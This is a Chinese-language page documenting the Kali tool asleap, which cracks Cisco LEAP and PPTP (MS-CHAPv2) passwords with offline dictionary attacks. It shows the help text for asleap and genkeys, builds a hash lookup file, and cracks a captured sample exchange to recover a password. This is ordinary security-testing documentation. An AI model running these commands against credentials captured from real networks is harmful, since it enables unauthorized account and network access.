Asleap包装说明

演示专有思科LEAP网络的一个严重缺陷。由于LEAP使用MS-CHAPv2的一个变体的身份验证交换,很容易加速离线字典攻击。 Asleap也可以攻击点点对点隧道协议(PPTP),以及任何MS-CHAPv2的交流,你可以在命令行上指定的挑战和响应值。 资料来源:http://www.willhackforsushi.com/?page_id=41

Asleap首页 | 卡利Asleap回购

  • 作者:约书亚·赖特
  • 许可:GPL第二版

    0x01 包含在asleap包工具

    asleap - 积极恢复LEAP / PPTP密码
    :~# asleap -h
asleap 2.2 - actively recover LEAP/PPTP passwords. <
>
Usage: asleap [options]
  -r  Read from a libpcap file
  -i  Interface to capture on
  -f  Dictionary file with NT hashes
  -n  Index file for NT hashes
  -s  Skip the check to make sure authentication was successful
  -h  Output this help information and exit
  -v  Print verbose information (more -v for more verbosity)
  -V  Print program version and exit
  -C  Challenge value in colon-delimited bytes
  -R  Response value in colon-delimited bytes
  -W  ASCII dictionary file (special purpose)

    0x02 genkeys - 生成asleap查找文件

    :~# genkeys
genkeys 2.2 - generates lookup file for asleap. <
>
genkeys: Must supply -r -f and -n
Usage: genkeys [options]
  -r  Input dictionary file, one word per line
  -f  Output pass+hash filename
  -n  Output index filename
  -h  Last 2 hash bytes to filter with (optional)

    0x03 genkeys用法示例

    读在一个词典 文件*
  • (-r /usr/share/wordlists/nmap.lst), 提供输出文件名 ​​(-f asleap.dat), 和一个输出索引文件名 ​​(-n asleap.idx): 
:~# genkeys -r /usr/share/wordlists/nmap.lst -f asleap.dat -n asleap.idx
genkeys 2.2 - generates lookup file for asleap. <
>
Generating hashes for passwords (this may take some time) ...Done.
5085 hashes written in 0.29 seconds:  17463.18 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 16254 compares.
Creating index file (almost finished) ...Done.

0x04 asleap用法示例

读捕获文件 (-r leap.dump), 提供hashfile文件名 ​​(-f asleap.dat), 该hashfile 指数(-n asleap.idx), 并跳过认证检查 (-s): 

:~# asleap -r leap.dump -f asleap.dat -n asleap.idx -s
asleap 2.2 - actively recover LEAP/PPTP passwords. <
>
Captured LEAP exchange information:
    username:          qa_leap
    challenge:         0786aea0215bc30a
    response:          7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
    hash bytes:        4a39
    NT hash:           a1fc198bdbf5833a56fb40cdd1a64a39
    password:          qaleap

原文来自https://www.hackfun.org/kali-tools/asleap_zh.html。转载请注明原出处,商用请联系原作者授权。

results matching ""

    No results matching ""